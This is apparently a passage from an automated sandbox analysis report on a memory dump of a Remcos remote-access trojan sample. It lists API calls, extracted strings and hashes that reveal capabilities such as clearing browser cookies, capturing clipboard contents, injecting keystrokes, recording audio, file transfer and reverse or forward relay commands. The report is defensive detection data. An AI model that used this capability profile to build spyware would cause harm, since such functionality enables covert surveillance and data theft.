                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                          • String ID: Remcos
                                                                                          • API String ID: 1970332568-165870891
                                                                                          • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                          • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                                                                          • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                          • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                                                                          • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                                                                          • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                                                                          • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 0045100F
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00451092
                                                                                          • __alloca_probe_16.LIBCMT ref: 004510CA
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451125
                                                                                          • __alloca_probe_16.LIBCMT ref: 00451174
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0045113C
                                                                                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004511B8
                                                                                          • __freea.LIBCMT ref: 004511E3
                                                                                          • __freea.LIBCMT ref: 004511EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                          • String ID:
                                                                                          • API String ID: 201697637-0
                                                                                          • Opcode ID: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
                                                                                          • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                                                                          • Opcode Fuzzy Hash: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
                                                                                          • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • _memcmp.LIBVCRUNTIME ref: 00442935
                                                                                          • _free.LIBCMT ref: 004429A6
                                                                                          • _free.LIBCMT ref: 004429BF
                                                                                          • _free.LIBCMT ref: 004429F1
                                                                                          • _free.LIBCMT ref: 004429FA
                                                                                          • _free.LIBCMT ref: 00442A06
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                          • String ID: C
                                                                                          • API String ID: 1679612858-1037565863
                                                                                          • Opcode ID: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
                                                                                          • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                                                                          • Opcode Fuzzy Hash: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
                                                                                          • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: tcp$udp
                                                                                          • API String ID: 0-3725065008
                                                                                          • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                          • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                                                                          • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                          • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Eventinet_ntoa
                                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                          • API String ID: 3578746661-168337528
                                                                                          • Opcode ID: e2fddcd864f1b862c8bd6a30b96e8862d45d519ccfdedf39a86f43d26816717a
                                                                                          • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                                                                          • Opcode Fuzzy Hash: e2fddcd864f1b862c8bd6a30b96e8862d45d519ccfdedf39a86f43d26816717a
                                                                                          • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                                                            • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                                                                                            • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                          • String ID: .part
                                                                                          • API String ID: 1303771098-3499674018
                                                                                          • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                                                                          • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                                                                          • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                                                                          • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                                                                                          • __alloca_probe_16.LIBCMT ref: 00447056
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                                                                                          • __alloca_probe_16.LIBCMT ref: 0044713B
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                                                                          • __freea.LIBCMT ref: 004471AB
                                                                                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          • __freea.LIBCMT ref: 004471B4
                                                                                          • __freea.LIBCMT ref: 004471D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3864826663-0
                                                                                          • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                                                                          • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                                                                          • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                                                                          • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                                                                          APIs
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InputSend
                                                                                          • String ID:
                                                                                          • API String ID: 3431551938-0
                                                                                          • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                          • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                                                                          • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                          • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                                                                          APIs
                                                                                          • OpenClipboard.USER32 ref: 00414F41
                                                                                          • EmptyClipboard.USER32 ref: 00414F4F
                                                                                          • CloseClipboard.USER32 ref: 00414F55
                                                                                          • OpenClipboard.USER32 ref: 00414F5C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                          • CloseClipboard.USER32 ref: 00414F84
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                          • String ID:
                                                                                          • API String ID: 2172192267-0
                                                                                          • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                                                                          • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                                                                          • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                                                                          • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                                                                          • __fassign.LIBCMT ref: 00447814
                                                                                          • __fassign.LIBCMT ref: 0044782F
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                                                                          • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                          • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                                                                          • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                          • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: $-E$$-E
                                                                                          • API String ID: 269201875-3140958853
                                                                                          • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                                          • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                                                                          • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                                          • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                                                                          APIs
                                                                                          • _strftime.LIBCMT ref: 00401D30
                                                                                            • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                          • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                                                                          • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                                                                          • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                          • String ID: %Y-%m-%d %H.%M$.wav
                                                                                          • API String ID: 3809562944-3597965672
                                                                                          • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                                                                          • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                                                                          • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                                                                          • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                                                                          APIs
                                                                                            • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                            • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                            • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                          • API String ID: 1133728706-4073444585
                                                                                          • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                                                                          • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                                                                          • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                                                                          • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                                                                          • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                                                                          • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                                                                          • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                                                                          APIs
                                                                                            • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                                                                          • _free.LIBCMT ref: 0044E128
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 0044E133
                                                                                          • _free.LIBCMT ref: 0044E13E
                                                                                          • _free.LIBCMT ref: 0044E192
                                                                                          • _free.LIBCMT ref: 0044E19D
                                                                                          • _free.LIBCMT ref: 0044E1A8
                                                                                          • _free.LIBCMT ref: 0044E1B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                          • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                                                                          • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                                          • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                                                                          APIs
                                                                                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                            • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                            • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                            • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                                                                          • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentOpenProcessQueryValue
                                                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 1866151309-2070987746
                                                                                          • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                                                                          • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                                                                          • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                                                                          • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                                                                          • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                                          • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                                                                          • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                                          • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                                                                          • GetLastError.KERNEL32 ref: 0040AA28
                                                                                          Strings
                                                                                          • UserProfile, xrefs: 0040A9EE
                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                                                                          • [Chrome Cookies not found], xrefs: 0040AA42
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                          • API String ID: 2018770650-304995407
                                                                                          • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                                                                          • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                                                                          • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                                                                          • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                                                                          APIs
                                                                                          • __allrem.LIBCMT ref: 00438A09
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                                                                          • __allrem.LIBCMT ref: 00438A3C
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                                                                          • __allrem.LIBCMT ref: 00438A71
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1992179935-0
                                                                                          • Opcode ID: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                                                                          • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                                                                          • Opcode Fuzzy Hash: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                                                                          • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
